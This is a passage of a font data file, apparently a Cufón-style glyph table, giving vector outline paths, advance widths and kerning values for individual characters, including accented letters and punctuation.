,0r87,-416r88,0r-88,416r213,0r0,88r-230,0r-85,406r315,0r0,88r-333,0r-85,414r-89,0r87,-414r-458,0r-84,414r-89,0r86,-414r-212,0r0,-88r231,0r85,-406r-316,0r0,-88xm497,-861r-85,404r457,0r85,-404r-457,0","w":1365},{"d":"244,-105v19,-64,10,-311,9,-425r-8,-687v-81,-14,-149,-11,-218,-22r0,-31v185,-19,341,-26,566,-28v223,-1,340,27,421,136v123,165,51,322,-155,415r-5,8v135,36,234,97,283,208v66,151,15,303,-109,409v-119,102,-300,125,-522,117r-151,5v-133,1,-211,2,-234,2v-23,0,-46,-1,-69,-3v-2,-26,5,-34,28,-38v83,-17,131,-29,142,-35v11,-6,18,-17,22,-31xm416,-1233v-2,53,2,96,2,148r-2,193r8,159v33,7,68,10,105,10v144,0,243,-31,293,-95v70,-89,96,-162,64,-274v-44,-156,-290,-185,-470,-141xm659,-53v159,-5,251,-80,305,-199v50,-112,13,-248,-48,-318v-53,-62,-171,-105,-290,-105v-121,0,-189,2,-204,7r-1,231v2,157,3,250,11,278v22,82,94,110,227,106","w":1259,"k":{"\u00dc":51,"\u00c5":63,"\u00c4":63,"U":51,"A":63,".":115,",":129}},{"d":"26,14v-4,-10,-5,-22,-2,-34v53,-25,155,-20,192,-55v45,-128,31,-532,29,-732r-3,-325v0,-37,-5,-61,-16,-72v-6,-23,-133,-43,-172,-62v-6,-5,-10,-15,-11,-29v130,-20,271,13,411,8v172,-6,353,-25,506,13v143,36,274,101,368,218v90,112,151,238,151,429v0,261,-143,469,-315,559v-112,59,-248,85,-475,85v-110,0,-167,-12,-255,-10xm414,-1204v-14,80,-2,175,-2,263r-1,227v0,333,7,518,19,556v12,38,43,81,103,99v336,102,629,-97,714,-355v47,-142,38,-342,-27,-485v-94,-208,-330,-342,-640,-342v-69,0,-121,8,-154,23v-4,4,-8,9,-12,14","w":1579,"k":{"\u00c5":102,"\u00c4":102,"Y":90,"W":51,"V":63,"A":102,".":193,",":180}},{"d":"820,-1426r88,0r-705,1703r-87,0","w":1024},{"d":"1046,-964v97,1,153,53,172,138r33,-110r157,-22r-117,399v-58,217,-81,238,-93,381v-3,40,34,75,74,75v49,0,107,-25,176,-73v133,-92,254,-350,249,-579v-8,-375,-266,-616,-648,-616v-354,0,-613,208,-743,475v-75,154,-115,313,-115,478v0,478,310,799,783,799v401,0,674,-236,804,-553r58,0v-103,338,-443,620,-867,614v-520,-7,-872,-362,-872,-886v0,-386,203,-701,471,-850v150,-84,308,-128,475,-128v429,0,707,268,714,685v4,247,-133,528,-289,624v-85,53,-172,82,-263,82v-96,0,-152,-46,-153,-136v0,-38,6,-87,18,-148v-92,111,-168,185,-228,225v-60,40,-115,60,-166,60v-105,-2,-181,-110,-181,-232v0,-97,32,-206,95,-326v63,-120,147,-218,251,-293v76,-55,144,-83,205,-83xm1182,-774v3,-79,-52,-143,-124,-143v-51,0,-102,28,-155,81v-105,104,-238,354,-250,544v-5,73,51,141,115,141v118,0,181,-89,255,-178v90,-107,154,-307,159,-445","w":1877},{"d":"527,24v-136,-16,-333,-5,-484,-6r-1,-30v56,-30,164,-16,196,-60v24,-222,6,-576,6,-849v0,-127,-4,-202,-13,-224v-17,-42,-69,-59,-125,-66v-41,-5,-67,-9,-79,-12r-1,-48v103,0,179,-3,227,-8v34,-3,35,-4,66,-2v35,28,65,65,96,100r211,233r30,36v43,50,81,93,116,128v35,35,104,109,205,221r329,362v-7,-107,0,-210,-3,-317r-7,-296v-1,-19,-2,-57,-8,-110v-9,-81,-1,-230,-20,-269v-10,-21,-147,-34,-194,-38v-5,-2,-11,-8,-16,-17v1,-11,4,-21,9,-30v60,-21,133,6,197,6v43,0,180,-11,236,-10r-2,31v-36,11,-118,13,-139,36v-16,17,-24,35,-24,53r11,316r8,145r11,601v0,22,-1,70,-4,143r-47,4v-27,-35,-306,-311,-392,-420r-87,-92r-283,-310v-54,-50,-178,-221,-251,-272v-10,218,12,622,14,903v1,28,2,55,5,81v70,16,150,18,222,35v5,4,9,7,12,9r-1,38v-11,3,-19,5,-26,5","w":1579,"k":{".":115,",":90}},{"d":"132,-410v-42,-118,-52,-287,-14,-410v37,-118,126,-259,223,-328v108,-77,271,-151,485,-144v263,9,424,96,552,260v75,96,124,227,124,380v0,186,-30,279,-111,391v-62,86,-207,201,-350,245v-216,66,-519,24,-655,-70v-96,-66,-209,-197,-254,-324xm1320,-639v0,-353,-172,-616,-521,-616v-209,0,-347,89,-425,239v-78,148,-126,354,-73,558v51,197,149,340,318,410v167,70,393,14,504,-70v136,-103,197,-293,197,-521xm1022,-1406v-45,0,-86,-40,-86,-84v0,-50,38,-89,86,-89v47,0,86,39,86,86v0,47,-39,87,-86,87xm678,-1406v-45,0,-86,-40,-86,-84v0,-49,38,-89,85,-89v46,0,87,41,87,87v0,46,-40,86,-86,86","w":1600,"k":{"Y":78,"X":90,"W":90,"V":117,"A":115}},{"d":"798,-1301r0,1743r-72,0r0,-1743r-187,0r0,1743r-73,0r0,-1043v-231,-11,-346,-45,-430,-181v-63,-102,-68,-280,-7,-379v80,-128,198,-195,407,-195r495,0r0,55r-133,0","w":917},{"d":"515,-1238v-67,3,-152,-14,-167,38v17,51,49,87,83,136v43,61,96,154,144,225r152,230r185,-263r166,-249v25,-39,44,-70,9,-101v-18,-16,-90,-26,-153,-34v-7,-13,-8,-18,-6,-33r240,4r193,-2r-3,35v-35,4,-79,7,-98,25v-187,193,-320,393,-461,599v-39,57,-42,73,-42,168v0,207,4,330,11,367v4,19,9,30,16,34v17,9,86,19,207,31v0,17,0,25,-7,41r-256,-11r-171,9r-184,-1v-9,-17,-2,-35,13,-37r129,-20v69,-28,80,-13,90,-67v2,-12,1,-105,1,-278v0,-136,5,-112,-49,-194r-131,-199r-223,-325v-39,-57,-73,-93,-101,-114v-12,-9,-72,-19,-119,-22r-3,-43r388,9v55,0,114,-6,165,2v7,8,7,15,7,28xm826,-1699v38,-28,111,-14,107,35v-4,51,-30,62,-81,97r-235,161v-7,1,-15,1,-22,0v70,-94,143,-229,231,-293","w":1344},{"d":"174,-982v2,-229,3,-215,-140,-275v0,-12,2,-18,8,-33v73,-13,150,-33,232,-58v5,-1,12,-1,22,-1v3,11,5,18,5,21r-2,585v0,3,1,15,2,34v54,-21,109,-44,168,-57v134,-30,185,-19,288,17v66,23,137,101,168,165v47,97,52,230,26,315v-41,135,-99,199,-220,257v-59,27,-121,41,-187,41v-81,0,-221,-57,-263,-68v-21,0,-47,27,-79,82r-29,-1v-8,-111,-4,-268,-3,-390r2,-218xm820,-366v0,-193,-130,-348,-312,-347v-64,0,-118,10,-161,31v-26,13,-40,24,-43,35v-7,18,-7,497,5,489v16,87,118,132,200,132v210,0,311,-123,311,-340","k":{"y":27,"w":27,"v":27,".":90,",":102}},{"d":"971,-414v0,332,-329,522,-640,380r-34,-14v-5,147,-1,481,15,488v15,35,148,24,162,47v10,6,17,18,20,36r-99,2r-370,-3v-1,-15,-2,-23,1,-37v50,-12,114,-13,139,-49v3,-12,5,-24,5,-36r-11,-953v-1,-135,-10,-137,-126,-161r6,-30v123,-56,150,-60,214,-143v12,-4,18,-4,32,3r0,193v86,-65,185,-109,320,-111v208,-3,366,172,366,388xm830,-345v0,-252,-200,-421,-447,-339v-36,12,-68,34,-97,62v-1,9,-2,18,-2,26v0,238,2,371,7,400v20,126,104,159,242,162v168,4,297,-136,297,-311","k":{".":88,",":102}},{"d":"468,-1339r89,0r0,1867r-89,0r0,-1867","w":1024},{"d":"169,-8v-65,1,-117,7,-184,1v0,-10,0,-14,4,-25v22,-13,40,-6,72,-9v110,-9,118,-12,151,-80v163,-337,252,-684,404,-1070v14,-37,31,-87,51,-150v21,-2,42,-2,64,-1v59,116,83,196,135,338r317,868v28,47,19,57,75,69v44,10,85,23,109,34v5,15,5,17,1,32r-325,-5r-121,2v-30,-3,-66,2,-88,-9v0,-9,2,-18,5,-27v50,-19,140,-5,189,-25v15,-46,2,-47,-20,-120v-10,-34,-23,-65,-32,-95v-9,-30,-44,-129,-106,-296v-110,-16,-228,-6,-349,-6v-23,0,-48,2,-75,5v-42,105,-67,210,-105,318v-37,105,-56,162,-56,173v0,6,3,16,9,30v51,14,130,16,192,23v13,11,13,14,8,31v-30,1,-53,1,-69,1xm466,-632v71,4,153,6,244,6v52,0,98,-2,137,-5v-54,-174,-123,-331,-186,-496r-10,-18v-67,151,-144,358,-191,509xm875,-1406v-45,0,-86,-40,-86,-84v0,-50,38,-89,86,-89v47,0,86,39,86,86v0,47,-39,87,-86,87xm531,-1406v-45,0,-86,-40,-86,-84v0,-49,38,-89,85,-89v46,0,87,41,87,87v0,46,-40,86,-86,86","w":1387,"k":{"y":51,"w":78,"v":117,"u":39,"Y":129,"W":180,"V":231,"U":90,"T":63,"Q":51,"O":78,"G":78,"C":78}},{"d":"1554,10v-79,8,-187,-9,-276,-9v-96,0,-206,4,-329,12v-12,-41,13,-40,50,-51v44,-14,91,-15,142,-18v-66,-81,-172,-158,-260,-232r-183,-154v-61,-52,-145,-118,-254,-199v8,-7,21,-17,40,-28v37,-23,105,-64,193,-136r274,-224v87,-77,137,-109,173,-173v-27,-32,-133,-23,-174,-38v-24,-20,3,-47,35,-42v116,15,288,10,421,0v8,0,20,1,36,2v0,16,-1,29,-4,39v-158,23,-155,23,-277,99v-142,88,-253,202,-380,305r-156,126v138,147,460,380,605,521v98,96,192,146,279,157v29,4,55,10,45,43xm334,4v-78,4,-170,19,-274,13v-2,-17,-5,-41,13,-41v68,0,120,-18,159,-36v31,-27,19,-103,19,-158r2,-267r-6,-278r2,-187v-5,-140,8,-187,-19,-252v-39,-24,-77,-17,-141,-24v-14,-11,-18,-21,-10,-39v42,-4,228,-1,302,-4v58,-2,135,-11,208,-6v12,6,13,14,9,27v-46,14,-146,20,-163,48v-17,14,-20,56,-20,95r-5,635r7,257v6,109,-11,128,22,154v26,21,94,24,142,35v8,18,10,29,-6,41v-54,6,-186,-15,-241,-13","w":1515,"k":{"\u00fc":27,"\u00f6":39,"\u00e5":-51,"\u00e4":-51,"\u00d6":78,"y":51,"w":63,"v":63,"u":27,"o":39,"e":27,"a":-51,"O":78,"G":63,"C":51}},{"d":"336,67v54,-101,170,-260,218,-342v297,-506,515,-848,648,-1029v22,-2,63,3,63,2r-437,685r-199,329r-230,353xm374,-701v-5,57,117,5,100,75r-294,0v-8,-51,58,-35,88,-52v8,-55,6,-366,7,-519v-78,48,-124,72,-137,72v-9,1,-19,-7,-22,-15v8,-25,53,-42,93,-73v50,-38,75,-61,111,-87v26,0,59,-7,59,22xm1485,-80v37,-9,31,-27,58,-75v17,1,49,-4,47,11r-19,138v-63,-2,-149,-5,-257,-3r-137,3v-44,-6,-77,7,-118,-6v8,-18,15,-31,22,-38v67,-75,282,-248,324,-322v25,-44,40,-83,40,-120v0,-104,-130,-153,-221,-98v-50,30,-57,62,-79,109v-12,15,-50,13,-46,-13v17,-99,106,-187,239,-187v165,0,284,153,182,292v-45,61,-250,215,-336,307v53,1,101,3,144,2r73,-2","w":1664},{"d":"515,-1238v-67,3,-152,-14,-167,38v17,51,49,87,83,136v43,61,96,154,144,225r152,230r185,-263r166,-249v25,-39,44,-70,9,-101v-18,-16,-90,-26,-153,-34v-7,-13,-8,-18,-6,-33r240,4r193,-2r-3,35v-35,4,-79,7,-98,25v-187,193,-320,393,-461,599v-39,57,-42,73,-42,168v0,207,4,330,11,367v4,19,9,30,16,34v17,9,86,19,207,31v0,17,0,25,-7,41r-256,-11r-171,9r-184,-1v-9,-17,-2,-35,13,-37r129,-20v69,-28,80,-13,90,-67v2,-12,1,-105,1,-278v0,-136,5,-112,-49,-194r-131,-199r-223,-325v-39,-57,-73,-93,-101,-114v-12,-9,-72,-19,-119,-22r-3,-43r388,9v55,0,114,-6,165,2v7,8,7,15,7,28","w":1344,"k":{"\u00e5":141,"\u00d6":78,"\u00c5":141,"\u00c4":141,"v":90,"u":115,"q":154,"p":115,"o":141,"e":154,"d":141,"a":141,"O":78,"G":78,"C":51,"A":141,";":141,":":129,".":270,"-":168,",":256}},{"d":"432,29v-234,3,-377,-147,-377,-358v0,-149,77,-227,177,-292v29,-19,145,-84,214,-91v-63,-80,-102,-139,-120,-177v-87,-180,57,-328,254,-328v152,0,262,86,262,223v0,148,-79,201,-198,257v24,37,107,129,151,182r171,213v81,-92,148,-183,166,-295v-3,-50,-33,-70,-82,-83v-5,-11,-5,-15,-2,-24r115,-11r277,-18v2,11,3,17,-2,29v-134,62,-155,93,-270,224v-68,77,-124,151,-172,217v85,101,144,164,178,187v67,47,161,43,224,-5v30,-23,34,-31,63,-21v-15,63,-28,99,-41,109v-51,42,-106,63,-167,63v-179,0,-260,-129,-365,-219v-102,103,-146,141,-270,189v-54,21,-116,29,-186,29xm571,-1173v-76,-3,-141,54,-137,124v6,114,105,206,173,274v69,-27,119,-112,120,-202v2,-114,-55,-194,-156,-196xm221,-362v0,166,144,270,336,270v132,0,244,-61,304,-134r-234,-281v-27,-34,-78,-92,-152,-173v-140,49,-254,159,-254,318","w":1493},{"d":"13,313v0,-122,142,-188,257,-247v-8,-4,-34,-15,-77,-33v-72,-53,-104,-53,-116,-126v6,-60,41,-63,102,-86v43,-16,79,-28,107,-41v-9,-6,-22,-15,-41,-26v-99,-61,-149,-146,-149,-255v0,-222,226,-377,460,-300v21,2,116,67,142,78v55,24,183,-32,234,-3v11,19,29,105,-21,99v-36,5,-155,-45,-190,-33v126,233,-55,459,-320,459v-61,0,-118,15,-169,46v-48,30,-50,57,-1,84v63,35,183,55,360,59v188,4,308,69,308,235v0,220,-236,301,-479,305v-179,4,-300,-44,-370,-124v-26,-29,-37,-61,-37,-91xm423,-784v-146,0,-193,112,-193,279v0,152,62,270,196,270v134,0,202,-111,202,-269v0,-158,-73,-280,-205,-280xm129,291v3,128,156,203,298,200v179,-4,387,-70,387,-232v0,-116,-96,-153,-223,-161v-112,-7,-181,-13,-206,-13v-117,-3,-259,85,-256,206","w":917,"k":{"\u00f6":-51,"\u00e5":-41,"\u00e4":-41,"y":-76,"r":-51,"p":-82,"o":-51,"g":-80,"e":-31,"a":-41,".":90}},{"d":"146,-945r1074,0r0,576r-87,0r0,-487r-987,0r0,-89","w":1365},{"d":"679,-1107v127,0,192,36,279,96r126,-126r73,76r-125,125v59,86,96,151,96,279v0,125,-38,190,-96,275r125,125r-73,74r-126,-125v-84,59,-153,97,-279,97v-124,0,-193,-38,-276,-96r-126,124r-75,-74r126,-124v-60,-86,-96,-151,-96,-279v0,-127,37,-190,96,-277r-126,-124r74,-76r126,125v89,-60,149,-95,277,-95xm1021,-659v0,-184,-157,-341,-341,-341v-185,0,-342,156,-342,341v0,183,158,341,342,341v183,0,341,-158,341,-341","w":1387},{"w":512},{"d":"252,-57v16,-29,12,-106,12,-152v0,-79,-7,-246,-10,-503r-4,-383v0,-48,-7,-78,-22,-91v-25,-22,-86,-40,-185,-54v-7,-16,-7,-22,1,-37v104,-9,166,5,284,-2r170,-10v131,-12,319,-3,406,39v107,52,193,187,194,328v2,243,-220,437,-493,374v-28,-6,-88,-34,-103,-67v3,-5,6,-8,11,-10v37,5,66,18,115,18v229,0,364,-247,254,-453v-46,-86,-95,-131,-208,-160v-82,-21,-222,-19,-259,1v-2,41,3,85,3,127v0,148,1,326,3,413r13,457v-3,48,-10,120,3,157v2,2,165,38,199,48v5,2,10,6,14,13v-12,38,-41,25,-92,19v-153,-17,-264,5,-416,-5v-7,0,-26,1,-58,2r-1,-26v53,-13,132,-17,169,-43","w":1152,"k":{"\u00e5":63,"\u00c5":154,"\u00c4":154,"o":78,"e":63,"a":63,"A":154,".":270,",":256}},{"d":"86,-686v-25,8,-40,-21,-22,-36v23,-19,75,-33,106,-64v46,-46,63,-67,92,-144v11,-27,19,-47,24,-58r31,1v4,71,4,144,2,218v75,4,182,-11,273,-5v3,34,3,38,-4,73r-267,9v-16,58,-4,139,-5,208r-2,264v2,115,14,173,105,173v37,0,121,-11,157,-49v20,-3,33,8,28,27v-60,64,-122,88,-246,90v-81,1,-150,-43,-162,-101v-31,-145,1,-427,-11,-608v-32,-2,-66,1,-99,2","w":597},{"d":"475,-1277v38,-28,111,-14,107,35v-4,51,-30,62,-81,97r-235,161v-7,1,-15,1,-22,0v70,-94,143,-229,231,-293","w":683},{"d":"650,-148v-1,76,92,98,129,35v8,-14,11,-19,34,-23v14,31,5,35,-18,72v-33,53,-57,88,-135,88v-90,0,-129,-42,-139,-137v-94,61,-167,134,-322,134v-66,0,-110,-45,-110,-109v0,-46,29,-101,85,-165v56,-64,132,-116,229,-157v68,-29,110,-47,125,-55v1,-22,2,-46,2,-72v-1,-142,-24,-217,-137,-217v-99,0,-168,64,-185,182v-3,18,-12,36,-23,56v-29,19,-52,28,-69,28v-19,0,-50,-10,-50,-29v0,-17,22,-55,56,-117v70,-126,243,-222,415,-168v54,17,107,78,113,140v11,115,2,376,0,514xm262,-231v-54,73,-32,178,61,178v82,0,136,-56,196,-112v6,-132,10,-152,4,-252v-92,34,-205,110,-261,186","w":832,"k":{"y":27,"w":27,"v":27}},{"d":"134,-701v0,-53,47,-101,101,-101v57,0,106,47,106,103v0,54,-49,102,-103,102v-56,0,-104,-48,-104,-104xm235,-182v99,2,154,69,152,179v-2,128,-56,188,-136,251v-27,21,-72,45,-137,73r-27,-39v77,-45,130,-86,158,-120v28,-34,42,-70,42,-108v0,-27,-22,-55,-45,-55r-62,2v-37,-1,-65,-38,-65,-80v0,-61,68,-104,120,-103","w":448},{"d":"386,3v-100,-9,-185,-2,-290,12v-5,0,-13,-1,-22,-3r-2,-25v91,-98,106,-128,181,-227r715,-952r15,-24v-116,-5,-226,-6,-341,4v-149,12,-346,-9,-417,85v-46,41,-83,126,-119,154r-17,2v19,-72,32,-120,71,-229r51,-143v12,-3,19,-3,32,-3v-5,18,-8,31,-8,38v0,69,52,70,157,64r178,-10r496,-12v48,0,98,-12,140,2v21,16,-103,149,-124,177r-784,1039r528,4v274,5,346,-88,390,-305v7,-7,16,-10,25,-10v9,8,6,31,6,43r-6,205v1,38,5,79,-3,113v-49,6,-74,0,-113,1r-258,4r-317,-7","w":1344},{"d":"650,-148v-1,76,92,98,129,35v8,-14,11,-19,34,-23v14,31,5,35,-18,72v-33,53,-57,88,-135,88v-90,0,-129,-42,-139,-137v-94,61,-167,134,-322,134v-66,0,-110,-45,-110,-109v0,-46,29,-101,85,-165v56,-64,132,-116,229,-157v68,-29,110,-47,125,-55v1,-22,2,-46,2,-72v-1,-142,-24,-217,-137,-217v-99,0,-168,64,-185,182v-3,18,-12,36,-23,56v-29,19,-52,28,-69,28v-19,0,-50,-10,-50,-29v0,-17,22,-55,56,-117v70,-126,243,-222,415,-168v54,17,107,78,113,140v11,115,2,376,0,514xm262,-231v-54,73,-32,178,61,178v82,0,136,-56,196,-112v6,-132,10,-152,4,-252v-92,34,-205,110,-261,186xm235,-1200v-35,-38,-9,-91,37,-93v24,0,49,13,78,35v39,30,157,201,205,274r-17,1v-86,-61,-244,-153,-303,-217","w":832},{"d":"222,-1006v91,-160,154,-269,191,-326r57,0r191,325r-4,26r-186,-183r-40,-36r-206,223v-4,-10,-3,-17,-3,-29xm650,-148v-1,76,92,98,129,35v8,-14,11,-19,34,-23v14,31,5,35,-18,72v-33,53,-57,88,-135,88v-90,0,-129,-42,-139,-137v-94,61,-167,134,-322,134v-66,0,-110,-45,-110,-109v0,-46,29,-101,85,-165v56,-64,132,-116,229,-157v68,-29,110,-47,125,-55v1,-22,2,-46,2,-72v-1,-142,-24,-217,-137,-217v-99,0,-168,64,-185,182v-3,18,-12,36,-23,56v-29,19,-52,28,-69,28v-19,0,-50,-10,-50,-29v0,-17,22,-55,56,-117v70,-126,243,-222,415,-168v54,17,107,78,113,140v11,115,2,376,0,514xm262,-231v-54,73,-32,178,61,178v82,0,136,-56,196,-112v6,-132,10,-152,4,-252v-92,34,-205,110,-261,186","w":832},{"d":"254,-1259v8,-21,31,-13,53,-13v139,0,297,16,405,-9v30,-24,29,-30,65,-24v0,46,-6,105,-19,151v-149,19,-337,-4,-457,9v-17,28,-9,121,-31,366v64,-39,174,-60,266,-36v176,46,239,109,299,273v48,132,8,307,-53,385v-51,65,-145,133,-244,164v-112,35,-150,23,-259,13v-65,-6,-139,-39,-165,-76v-37,-52,44,-112,102,-79v53,30,91,65,146,96v168,49,287,-54,344,-175v118,-254,-97,-564,-384,-461v-33,12,-54,27,-65,42v-14,5,-30,16,-45,8v-2,-12,-3,-21,-3,-27v0,-69,6,-160,21,-224v-6,-41,4,-82,5,-119v2,-153,10,-241,19,-264","w":960},{"d":"882,-1275v0,0,88,-5,67,37v-27,16,-141,3,-135,39v9,56,137,338,179,432v31,-61,77,-157,128,-290v29,-76,54,-110,17,-159v-11,-16,-76,-12,-97,-27v-6,-15,9,-34,22,-34v14,0,190,7,249,6v43,-1,125,-11,94,37v-41,17,-127,29,-153,52v-56,50,-85,143,-118,216v-22,47,-33,86,-43,111v-17,44,-48,108,-67,156r140,323r41,89v0,0,43,94,58,135v64,-195,152,-369,219,-560r116,-330v15,-49,26,-92,35,-142v-5,-49,-67,-33,-129,-66v-3,-12,-4,-17,-2,-26r322,1v2,11,1,16,-1,31v-109,45,-108,36,-152,142v-2,4,-19,65,-63,180r-216,562r-151,414v-21,2,-24,2,-44,1v-65,-170,-195,-450,-262,-575v-85,146,-194,428,-291,575r-43,1r-162,-396r-134,-314r-139,-353v-5,-13,-9,-26,-13,-39v-7,-21,-25,-68,-56,-141v-14,-36,-86,-39,-117,-53v-5,-37,29,-34,78,-34r171,1v87,0,140,1,158,4v2,20,1,23,-1,44v-39,4,-83,-1,-116,9v-13,27,9,48,17,70r63,176r256,641r84,195v38,-57,188,-361,217,-448r-233,-526v-58,-112,-22,-110,-163,-121r-21,-5v-5,-6,-8,-13,-8,-21v-1,-21,45,-15,54,-15r251,0","w":1813,"k":{"\u00e5":154,"\u00d6":39,"\u00c5":168,"\u00c4":168,"y":78,"u":90,"r":90,"o":168,"h":-20,"e":168,"d":129,"a":154,"O":39,"G":51,"C":27,"A":168,";":141,":":154,".":307,"-":193,",":307}},{"d":"129,443v-45,0,-82,-45,-82,-95v0,-34,38,-165,42,-205v31,-284,16,-613,20,-928r135,0r0,479v-2,152,40,225,167,225v126,0,150,-55,253,-143r0,-561r132,0r0,505v0,95,8,154,23,178v15,24,36,36,61,36v69,0,70,-48,95,-134r43,0v-7,141,-74,232,-193,232v-109,0,-149,-74,-161,-195v-93,97,-179,191,-322,191v-101,0,-147,-48,-183,-122r0,40v4,128,-3,184,27,285v16,54,22,92,22,115v2,52,-34,96,-79,97","w":1024},{"d":"166,-696v0,-11,-5,-20,-16,-29r-117,-28r0,-32r108,2v50,-4,144,-1,154,0r-6,381v0,117,3,191,11,220v25,105,194,118,296,66v44,-22,83,-45,114,-74v10,-105,9,-227,9,-339v0,-108,-5,-169,-16,-183v-1,-19,-123,-32,-173,-39v-8,-14,-9,-19,-5,-31v90,-6,241,0,321,-2r2,73r-10,457r4,136v13,29,29,22,74,24v9,0,33,2,74,6r1,30v-117,24,-185,49,-273,74v-10,-58,-2,-90,-6,-151v-88,62,-180,154,-311,154v-172,0,-241,-132,-238,-344v-1,-23,6,-91,5,-103xm673,-1056v-45,0,-86,-40,-86,-84v0,-50,38,-89,86,-89v47,0,86,39,86,86v0,47,-39,87,-86,87xm329,-1056v-45,0,-86,-40,-86,-84v0,-49,38,-89,85,-89v46,0,87,41,87,87v0,46,-40,86,-86,86","w":1003},{"d":"178,-1387v59,-1,107,45,104,105v-5,110,-59,352,-80,479r-44,0r-54,-296v-15,-82,-23,-137,-23,-166v-1,-77,29,-120,97,-122","w":363},{"d":"403,-1159v-7,-125,-98,-201,-226,-228r0,-35v197,18,371,185,376,383v2,86,-49,241,-46,320v4,110,109,198,228,208r0,41v-121,11,-223,97,-228,209v-3,77,48,234,46,319v-5,197,-180,366,-376,384r0,-35v129,-30,219,-101,226,-229v5,-79,-51,-241,-46,-322v9,-173,136,-292,296,-344v-157,-53,-286,-176,-296,-348v-4,-82,50,-243,46,-323","w":981},{"d":"216,-516v-9,-138,-5,-279,-3,-415r2,-142r-2,-178r2,-34r388,2r2,42v-79,3,-215,-16,-253,21v-14,102,-15,304,-12,425r5,232r1,266v-7,117,5,240,1,360r-6,193v5,50,-2,115,13,154v48,32,163,18,247,22r2,43r-389,0v-16,-234,-3,-459,-1,-696","w":555},{"d":"-12,154r1048,0r0,102r-1048,0r0,-102","w":1024},{"d":"40,-1242v-17,-56,69,-39,123,-39r421,-3v5,21,7,24,2,44v-66,19,-162,-19,-187,51v-20,188,-7,406,-7,609v0,181,9,293,18,338v30,142,173,205,334,209v208,5,325,-58,390,-185v51,-100,50,-323,41,-488r-15,-287v-7,-221,-12,-214,-192,-260v-3,-9,-5,-19,-6,-29v65,-10,182,5,233,4r189,-4r-1,36v-82,11,-131,24,-147,38v-38,52,-24,100,-20,214r7,207r2,186v0,223,-2,304,-57,424v-60,131,-230,206,-419,211v-199,4,-294,-37,-389,-111v-103,-80,-127,-148,-129,-328r-3,-349r3,-378v-2,-56,-4,-97,-48,-97v-45,0,-127,3,-143,-13xm947,-1406v-45,0,-86,-40,-86,-84v0,-50,38,-89,86,-89v47,0,86,39,86,86v0,47,-39,87,-86,87xm603,-1406v-45,0,-86,-40,-86,-84v0,-49,38,-89,85,-89v46,0,87,41,87,87v0,46,-40,86,-86,86","w":1451,"k":{"A":141}},{"d":"724,-1116v60,-9,77,-47,88,-121r29,0v11,116,-61,201,-164,204v-113,3,-184,-120,-288,-120v-64,0,-77,44,-90,118r-28,0v-14,-122,93,-243,231,-190v42,16,179,116,222,109xm971,-384v0,222,-220,420,-464,411v-246,-9,-434,-172,-434,-429v0,-176,112,-317,238,-376v61,-28,135,-42,222,-42v241,0,438,200,438,436xm227,-381v0,215,102,369,288,369v199,0,301,-169,301,-382v0,-187,-87,-395,-291,-387v-209,9,-298,157,-298,400"},{"d":"104,-1328v39,3,48,109,111,93v201,13,424,4,640,6r155,-3v44,-2,102,21,133,-2v2,-3,13,-25,33,-68v13,-27,24,-35,52,-25v11,140,3,157,0,361v0,7,-1,14,-4,20v-36,18,-38,-6,-48,-47v-40,-160,-67,-176,-287,-176v-76,0,-132,1,-169,4v-1,27,-2,51,-2,73r8,621v0,25,-4,71,-4,140r0,207v3,62,16,65,77,79r154,36r0,30r-318,-9r-253,13v-44,-1,-50,2,-69,-8v4,-36,8,-34,46,-40v45,-7,149,-30,174,-53v29,-44,24,-92,23,-203r-4,-541r-4,-80r-1,-267v-70,-10,-304,-10,-336,11v-31,21,-83,72,-146,164v-23,33,-40,51,-56,51v-8,0,-14,-7,-13,-13v1,-22,41,-161,40,-176r41,-151v5,-29,6,-43,27,-47","w":1259,"k":{"\u00e5":90,"\u00c5":51,"\u00c4":51,"z":129,"y":141,"w":129,"u":90,"s":102,"r":102,"o":154,"m":115,"l":-20,"h":-31,"e":115,"c":115,"a":90,"A":51,";":63,":":63,".":168,"-":102,",":141}},{"d":"743,-1202v7,75,-66,121,-132,78v-66,-43,-120,-108,-221,-112v-97,-4,-105,145,-64,225r70,137v117,180,265,410,330,629v59,197,39,464,-63,594v-52,66,-125,115,-216,134v-114,23,-117,21,-219,-4v-65,-16,-92,-37,-94,-109v-1,-54,22,-87,69,-88v72,13,198,136,257,132v57,-4,105,-53,101,-118v-9,-135,-48,-166,-124,-293v4,-5,-213,-346,-256,-471v-50,-146,-53,-215,-65,-370v-12,-152,66,-282,116,-351v65,-89,150,-122,304,-125v107,-2,200,42,207,112xm609,337v128,-119,91,-470,15,-640v-11,-27,-44,-106,-115,-227v-86,-145,-161,-263,-207,-364v-23,-51,-44,-124,-63,-221v-74,122,-78,377,-15,525r34,104r84,174v43,85,85,147,131,226v73,123,111,209,143,288v-5,81,-7,126,-7,135","w":875},{"d":"11,6v1,-10,3,-19,8,-27v52,-14,103,-22,152,-28v79,-10,72,-16,75,-118r7,-264r-2,-738v-1,-7,-3,-16,-8,-28v-68,-29,-61,-17,-200,-45v-1,-15,-1,-17,0,-32r357,10v80,1,86,-7,148,-7v54,0,92,1,114,3v-1,12,-3,25,-7,39v-6,3,-212,7,-211,17v-34,24,-25,131,-25,205r3,579r-2,344v0,20,3,32,10,37r215,2v84,-5,209,2,270,-19v34,-12,134,-96,161,-142v22,-38,40,-58,68,-128r33,0v-4,24,-8,47,-13,68v-19,94,-33,172,-40,235v-1,13,-3,26,-4,37v-232,-12,-865,-11,-946,-2v-51,6,-109,1,-163,2","w":1173,"k":{"\u00dc":27,"Y":63,"W":78,"V":51,"U":27,"T":111}},{"d":"89,-1227v0,-67,60,-84,129,-84v139,0,222,61,317,157v97,99,191,303,112,470v-37,79,-75,115,-154,145v-13,11,-173,19,-203,44v-33,27,-34,31,-38,106r-5,75r-42,0r-35,-306v0,-5,2,-11,5,-20v58,-34,256,-24,286,-47v88,-29,137,-92,142,-197v7,-140,-135,-304,-257,-304v-18,-4,-149,30,-178,30v-46,1,-79,-26,-79,-69xm227,30v-46,0,-96,-52,-96,-99v0,-65,53,-109,105,-110v51,-1,97,54,97,110v0,61,-43,99,-106,99","w":747},{"d":"411,0v-126,-10,-250,3,-373,-1v-5,-15,-5,-21,-2,-34v55,-15,111,-20,154,-59v33,-30,112,-124,231,-287r-275,-330v-17,-25,-89,-30,-116,-38v-2,-14,-2,-22,-2,-35v39,-10,159,-1,180,-1r218,-3v7,17,10,19,3,35v-52,10,-108,3,-115,33v0,11,8,26,24,47v78,101,131,167,159,196v82,-119,109,-128,131,-217v-7,-51,-37,-51,-106,-64v-8,-12,-10,-19,-5,-30v49,-2,98,4,147,3r204,-3v14,7,15,14,11,29v-96,15,-166,48,